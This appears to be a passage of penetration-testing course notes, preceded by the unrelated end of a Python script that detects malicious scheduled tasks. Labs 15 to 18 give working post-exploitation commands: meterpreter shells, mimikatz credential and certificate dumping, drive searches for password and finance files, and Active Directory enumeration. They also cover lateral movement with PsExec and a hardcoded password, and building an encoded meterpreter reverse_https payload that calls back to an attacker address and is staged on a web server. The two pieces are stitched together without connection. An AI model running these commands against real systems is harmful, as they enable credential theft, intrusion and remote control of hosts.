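    hits, score = [], 0
    for pattern, name, weight in INDICATORS:
        if re.search(pattern, text, re.I):
            hits.append(name)
            score += weight
    return {"score": score, "hits": hits,
            "urls": sorted(set(URL_RE.findall(text))), "stages": stages}


def triage_tasks(schtasks_csv: str, threshold: int = 5) -> list:
    """Parse schtasks CSV output and return the tasks scoring at or above threshold."""
    flagged = []
    for row in csv.DictReader(io.StringIO(schtasks_csv)):
        result = score_command(row.get("Task To Run", ""))
        if row.get("Run As User", "").upper() in ("SYSTEM", "NT AUTHORITY\\SYSTEM"):
            result["score"] += 1         # a cradle running as SYSTEM is worse than one as a user
            result["hits"].append("runs as SYSTEM")
        if result["score"] >= threshold:
            flagged.append({"host": row.get("HostName", ""), "task": row["TaskName"],
                            "trigger": row.get("Schedule Type", ""), **result})
    return flagged


if __name__ == "__main__":
    for task in triage_tasks(SCHTASKS_CSV):
        print(task["task"], task["trigger"], task["score"], ", ".join(task["hits"]), task["urls"])
    wrapped = score_command(STAGER_32)
    print("stager unwraps to:", wrapped["stages"][0])
```

Point `triage_tasks` at `schtasks /query /fo CSV /v` output exported from a host and `score_command` at process command lines from your event source; the benign PowerShell maintenance task scores 1 and is not reported, while the lab's task and its Base64-wrapped stage both cross the threshold.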

Lab 15: Host Enumeration


meterpreter> execute -c -H -f cmd -a "/k" -i     <--- Switch to command shell

gpresult /z

List OS Version:
ver
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v ProductName

View the list of started services (ex: search for AV):

net start

sc query

View the list of started processes and their respective owner:
tasklist /v

Kill a process by name:


taskkill /F /IM "cmd.exe"

List the software installed on the system:


reg query HKLM\Software

reg query HKCU\Software

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion"


List Mounted Devices:


fsutil fsinfo drives

reg query HKLM\system\mounteddevices

List Most Recently Run Commands:


c:\reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
Check for Autorun:
reg.exe query HKLM\Software\Microsoft\Windows\CurrentVersion\Run /S

reg.exe query HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall /S

reg.exe query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ /S

reg.exe query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ /S

Check AutoStart Tasks

at

type "%SystemRoot%\system.ini"

dir "%SystemRoot%\Tasks"

Lab 16: Credential Harvesting & Data-Mining


meterpreter > getsystem
meterpreter > load mimikatz
meterpreter > kerberos

meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a "full"

meterpreter > msv     <-- Your AD password

meterpreter > livessp     <-- Your Windows7/8 password

meterpreter > ssp     <-- Your Outlook password

meterpreter > tspkg     <-- Your AD password

meterpreter > wdigest     <-- Your AD password

meterpreter > mimikatz_command -f crypto::listStores


meterpreter > mimikatz_command -f crypto::listCertificates
meterpreter > mimikatz_command -f crypto::exportCertificates
meterpreter > mimikatz_command -f crypto::patchcapi

meterpreter> search -d <directory> -f <file-pattern>

Data Mining The Host


meterpreter> execute -c -H -f cmd -a "/k" -i     <--- Switch to command shell

Search the drive and sort the files by time accessed
c:\dir C:\ /S /OD /TA

Search the drive and sort the files by time created


c:\dir C:\ /S /OD /TC

Search the drive and sort the files by time written
c:\dir C:\ /S /OD /TW

Search the drive for files with business critical names or important file types
c:\dir c:\*bank* /s

c:\dir c:\*password* /s

c:\dir c:\*pass* /s

c:\dir c:\*competitor* /s

c:\dir c:\*competition* /s

c:\dir c:\*finance* /s

c:\dir c:\*invoice* /s
c:\dir c:\*risk* /s
c:\dir c:\*assessment* /s
c:\dir c:\*key* /s
c:\dir c:\*.vsd /s
c:\dir c:\*.pcf /s
c:\dir c:\*.ica /s
c:\dir c:\*.crt /s
c:\dir c:\*.key /s
c:\dir c:\*.log /s
Search the drive for files with critical data in them
c:\type c:\sysprep.inf
c:\type c:\sysprep\sysprep.xml
c:\findstr /I /N /S /P /C:password *
c:\findstr /I /N /S /P /C:secret *
c:\findstr /I /N /S /P /C:confidential *
c:\findstr /I /N /S /P /C:account *
c:\findstr /I /N /S /P /C:payroll *
c:\findstr /I /N /S /P /C:credit *

c:\findstr /I /N /S /P /C:record *
Active Directory Enumeration
meterpreter> execute -c -H -f cmd -a "/k" -i     <--- Switch to command shell
c:\net view

c:\net view /domain

c:\net user

c:\net user /domain

c:\net localgroup

c:\net localgroup /domain

c:\net localgroup administrators

c:\net localgroup administrators /domain

c:\net group "Domain Users" /domain

c:\net group "Domain Admins" /domain

net user "jima" /domain

echo %logonserver:*\\=%

c:\dsquery user -name *

c:\dsquery user -name * -limit 1000     <-- Increasing dsquery limit

c:\dsquery group     <-- Listing all of the groups on a machine

c:\dsquery group "<distinguished name>"     <-- Listing all of the groups on a machine

Useful Resource Kit Tools


-------------------------

Find out which OU a user account resides


c:\dsquery user -samid user_name

List all domain users


c:\dsquery * -filter "(&(objectcategory=person)(objectclass=user)(name=*))" -limit 0 -attr samaccountname

All info about user "yoy"
c:\dsquery * -filter "(&(objectcategory=person)(objectclass=user)(samaccountname=yoy))" -limit 0 -attr *

Query Groups
c:\dsquery * -filter "(&(objectcategory=group)(objectclass=group)(name=*))" -limit 0 -attr Name

Query a specific group - in this case "Users"

c:\dsquery * -filter "(&(objectcategory=group)(objectclass=group)(name=Users))" -limit 0 -attr *

Lab 17: Life without metasploit


echo @echo off > pingsweep.bat
echo for %%a in (1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254) do ping -n 2 -w 2000 %1.%%a >> pingsweep.bat
more pingsweep.bat

pingsweep 10.10.30

for /L %i in (1,1,255) do @echo 10.10.30.%i >> ips.txt


more ips.txt

echo heat >> names.txt


echo jima >> names.txt
echo roge >> names.txt
echo patr >> names.txt
echo jami >> names.txt
echo bonn >> names.txt
echo rhon >> names.txt
echo sall >> names.txt
echo joyj >> names.txt
echo laur >> names.txt
echo sloa >> names.txt
echo Administrator >> names.txt
more names.txt

for /f "tokens=1" %a in ('net view ^| find "\\"') do @echo %a >> hosts.txt

PsExec to a machine that you want to connect to


PSExec in Windows
c:\psexec.exe /accepteula \\10.10.30.81 -u administrator -p P@ssw0rd4321! cmd.exe
PSExec in Linux
cd ~/toolz
wget https://s3.amazonaws.com/StrategicSec-Files/winexe
chmod 777 winexe
./winexe -U Administrator%P@ssw0rd4321! //WIN7-X64-1 cmd.exe

How many users are logged on/connected to a server?


NET SESSION | FIND /C "\\"

Map a drive to what you want to become your staging server
net use O: \\10.10.30.89\c$ /u:administrator P@ssw0rd4321!
net use O: /d

Which updates were installed on this computer?


Windows 7/8 (note: DISM will return far more details than WMIC.):
c:\DISM /Online /Get-Packages

or:
c:\WMIC QFE List

Lab 18: Setting up your second entry


sudo add-apt-repository ppa:tobydox/mingw

sudo apt-get update

sudo apt-get install mingw64-x-gcc mingw32-x-gcc

cd /home/strategicsec/toolz/metasploit
touch ./met_template.c

./msfpayload windows/meterpreter/reverse_https LHOST=10.10.5.234 LPORT=443 EXITFUNC=thread R | ./msfencode -c 5 -e x86/shikata_ga_nai > payload

cat payload

sed -i -e 's/\ +//' ./payload


cat payload

cat /dev/urandom | tr -dc A-Za-z0-9 | head -c512 > random


cat random

vi win-met-rev-https.c

/opt/mingw32/bin/i686-w64-mingw32-gcc ./win-met-rev-https.c -o ./win-met-rev-https.exe


chmod 777 ./win-met-rev-https.exe
cp /home/strategicsec/toolz/metasploit/win-met-rev-https.exe /var/www/
exit
